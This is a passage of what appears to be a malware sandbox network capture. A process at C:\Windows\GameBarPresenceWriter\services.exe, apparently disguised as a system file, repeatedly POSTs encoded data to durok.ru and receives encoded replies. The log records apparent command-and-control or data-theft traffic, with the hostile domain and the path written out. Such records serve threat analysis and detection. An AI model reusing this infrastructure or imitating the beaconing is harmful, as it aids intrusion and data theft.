                                                                                                                              Dec 26, 2024 17:18:03.739891052 CET2548OUTData Raw: 59 50 5e 50 51 5e 59 53 5e 58 52 54 56 51 58 5a 54 5c 5b 58 56 5e 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^PQ^YS^XRTVQXZT\[XV^S[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')2 (62;/>-U)Y$$7,P7/&Y-'+$^>5"Z.#Z*


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              49192.168.2.449802104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:04.157877922 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:04.505635023 CET2128OUTData Raw: 59 50 5e 5f 51 5e 59 52 5e 58 52 54 56 5d 58 51 54 52 5b 5f 56 52 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^_Q^YR^XRTV]XQTR[_VRS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<"/?:)T6/,Q*2_3< ?8U4<2_,:$C> <\="Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:05.597209930 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:05.853837967 CET949INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:05 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yraUTbNuv%2FEqYFpT5yfB%2BUrSUeJRNjllBECDek48iKrZ5e5Cn%2BRTUkjxemjU7AuB0Xizgp6%2FhqdkLg0BttoYLVVooNKzbdCq3IibolSgrZN4eXAZhP2bm2LmcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82627fbb2141df-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11380&min_rtt=1871&rtt_var=19721&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=18729&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 02 2a 07 02 0f 34 3f 30 1e 2b 3e 3e 50 28 21 31 5e 2b 32 07 5e 3f 3c 25 0f 3f 01 2c 0b 23 2a 32 10 3e 3a 24 5c 32 08 3a 10 24 21 2e 5c 05 1d 27 5b 3c 38 3f 07 26 21 2d 1c 29 07 39 1a 29 3e 32 03 25 3f 0a 02 37 5d 2a 5f 20 21 3f 04 2c 02 2c 5e 2d 5a 30 5a 3c 30 29 03 21 2d 21 51 0c 1f 3b 0e 36 07 0d 59 25 2d 3e 0a 22 56 3b 51 25 06 2a 1f 22 05 05 54 24 14 3f 5c 27 23 2b 55 20 5b 33 1f 28 3d 00 5f 25 06 35 5d 3e 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98'*4?0+>>P(!1^+2^?<%?,#*2>:$\2:$!.\'[<8?&!-)9)>2%?7]*_ !?,,^-Z0Z<0)!-!Q;6Y%->"V;Q%*"T$?\'#+U [3(=_%5]>9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              50192.168.2.449803104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:04.277775049 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:04.641232967 CET2548OUTData Raw: 5c 59 5e 58 51 5f 5c 52 5e 58 52 54 56 58 58 53 54 5d 5b 58 56 50 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y^XQ_\R^XRTVXXST][XVPSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')2 _>)5$[8>)>41$;[7<T ,:[.E+0<]+5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:05.828226089 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:06.082776070 CET803INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:05 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OZJ67ut8t%2F2KEWjMghFaeZiDJMWruNVdvWEr3gtuPvrMVDPhfyUwuL%2FEUZJ61DG%2Fo0co%2BDFqulbUHpYMqVwhD1mb0AKfTEGUjqsOP7%2BhzCjyPtDp1S2urrvUhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82628159b2c434-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=97398&min_rtt=52120&rtt_var=51887&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=28012&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              51192.168.2.449809104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:06.325381041 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:06.677433014 CET2548OUTData Raw: 59 51 5e 5f 54 55 5c 51 5e 58 52 54 56 5e 58 50 54 55 5b 59 56 54 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^_TU\Q^XRTV^XPTU[YVTS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+1<Z+9P5T$_/-)):[%$,4#&_,:8E(<]="Z.#Z*


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              52192.168.2.449810104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:06.985853910 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:07.333637953 CET2128OUTData Raw: 59 58 5b 5a 51 5b 59 56 5e 58 52 54 56 5b 58 53 54 5d 5b 5b 56 53 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[ZQ[YV^XRTV[XST][[VSS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'?0?_56"/8=5T='=''']7 Q7!-)$C<3#>"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:08.265398026 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:08.567361116 CET950INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:08 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aj%2B%2B922VGNu%2FvxLFgkIX4XYSsjcwExpTe%2BRvSr5myr3NDCiIILuCCA70Wnv3NTFNWnJIJwMbHGmAI3tru2eOPgUPucbk2nSZv2J2HiSX%2F9hMg5XsVtCk16JFNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262909dc872ab-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3460&min_rtt=1899&rtt_var=3835&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2459&delivery_rate=101445&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 13 2a 00 24 0f 37 2f 27 0e 28 2d 3d 0f 3d 21 3e 07 2a 31 2e 07 28 11 22 57 28 01 28 09 37 04 00 11 3d 2a 28 58 31 0f 2d 03 26 31 2e 5c 05 1d 27 5a 3f 38 33 00 27 32 03 5a 2a 00 3a 08 29 2d 39 5f 30 01 30 00 23 38 3a 15 20 31 05 01 2c 5a 34 5f 2d 02 2b 03 3f 30 03 05 22 2d 21 51 0c 1f 38 1e 35 3a 3b 13 27 2e 2e 0b 35 0e 30 0d 31 06 00 1d 22 15 09 57 24 29 38 04 32 30 3b 54 23 03 3b 56 3f 04 21 00 25 3f 29 11 29 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$*$7/'(-==!>*1.("W((7=*(X1-&1.\'Z?83'2Z*:)-9_00#8: 1,Z4_-+?0"-!Q85:;'..501"W$)820;T#;V?!%?))9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              53192.168.2.449811104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:07.196902990 CET331OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Dec 26, 2024 17:18:07.552474022 CET2548OUTData Raw: 5c 5e 5e 51 54 5d 59 5a 5e 58 52 54 56 5a 58 52 54 51 5b 55 56 53 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^QT]YZ^XRTVZXRTQ[UVSSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$("+>9:#" X;=*>4%'/\#/# ?194<8X)"Z.#Z**
                                                                                                                              Dec 26, 2024 17:18:08.583554029 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:08.850842953 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:08 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g7FKDck3SU0Zp1ZKC740szlXhTLQpQC%2BZngA1YYtpehCKt5Ru0miJjcsBJLLoRfc0pDjP7jzpb3c%2B0DsOuI1grdkYe41%2FQR1Whr6r7FVqkhHJODsZIL8OIQX9w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82629269a8c436-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5389&min_rtt=1752&rtt_var=7931&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2879&delivery_rate=47327&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              54192.168.2.449817104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:09.089729071 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:09.443401098 CET2548OUTData Raw: 59 59 5e 51 51 5c 59 52 5e 58 52 54 56 51 58 53 54 51 5b 5d 56 50 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY^QQ\YR^XRTVQXSTQ[]VPSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')1<*5T6";;%='.[$7$7 U <"Y.(+>"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:10.349991083 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:10.605757952 CET795INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:10 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y3twWTPBo4gX72YiZ7y5dyNzRaTZaFHBRp1h5EqQHGeoInIdvbpJWBdiRgsCCIPVLfsRECaZ9LoBk879hdG%2BWdy3Gv8MjyocPCdV3BrYz2Q8wdy4IiMaPR9DvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82629da8a018cc-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=51797&min_rtt=51395&rtt_var=20077&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26734&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              55192.168.2.449818104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:09.707442999 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:10.052357912 CET2128OUTData Raw: 59 59 5b 58 51 59 59 53 5e 58 52 54 56 5b 58 52 54 57 5b 58 56 57 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[XQYYS^XRTV[XRTW[XVWSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+1>*%T!4;%)%''/[ ,+",.B<3*"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:10.921268940 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:11.173861027 CET952INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:10 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJPNKt8uj353KuQCXf9FcA9BwShrA6XYjJo54W%2FJyF94IcH%2BW4Ie67M2ywUkevITZSlVvT3FIV1gr8PqaJQJsB8%2FglYez%2Fy%2Bpll8d2%2BmRpwWx701A67mzhXqXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262a13a4a4386-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3326&min_rtt=1721&rtt_var=3857&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=100219&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 03 29 39 33 56 23 12 33 0e 3f 2d 25 0f 3d 21 03 15 3c 0c 25 59 3c 01 0c 56 2b 06 3f 52 20 14 2e 11 29 14 28 5c 27 35 25 04 26 21 2e 5c 05 1d 27 19 28 02 30 5a 30 0c 3e 07 29 07 3e 47 3e 3e 3d 5e 27 3c 2f 5d 21 28 25 07 37 22 3b 00 38 12 34 5e 3a 12 02 1d 2a 33 22 12 36 07 21 51 0c 1f 38 52 36 39 3b 12 27 3d 35 1f 20 20 30 08 27 2b 39 0a 22 38 34 08 24 04 23 5b 31 33 2b 55 23 3e 3b 1f 28 3d 08 12 32 59 3a 02 3d 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98')93V#3?-%=!<%Y<V+?R .)(\'5%&!.\'(0Z0>)>G>>=^'</]!(%7";84^:*3"6!Q8R69;'=5 0'+9"84$#[13+U#>;(=2Y:=%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              56192.168.2.449824104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:11.015789032 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:11.364842892 CET2548OUTData Raw: 59 5c 5b 5b 54 5a 59 57 5e 58 52 54 56 5d 58 54 54 52 5b 5c 56 5e 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\[[TZYW^XRTV]XTTR[\V^SZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z+W++)T5[,-Q>4&$$("/,W4"Y9);<="Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:12.230376005 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:12.481782913 CET796INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:12 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LpavrYyEIWezXQFBBQmyUrNOHD5CsfxSqFIadlhS0dNhRboKYaIlUAcRqSXkwMDnexE6T8B4ruzUV4%2FQTK3uKUAt9WlWRUkSo1%2BdvqhPkH7lTdZojeH%2BQsgzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8262a9492dde93-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3861&min_rtt=1620&rtt_var=5090&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=74672&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              57192.168.2.449825104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:12.298702002 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:12.647907019 CET2128OUTData Raw: 5c 59 5e 51 51 5b 5c 55 5e 58 52 54 56 5f 58 53 54 5c 5b 5e 56 53 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Y^QQ[\U^XRTV_XST\[^VSSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z+!+:*628^,-*>'Z#<,#-*?+,Y+%"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:13.477473021 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:13.733740091 CET945INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:13 GMT
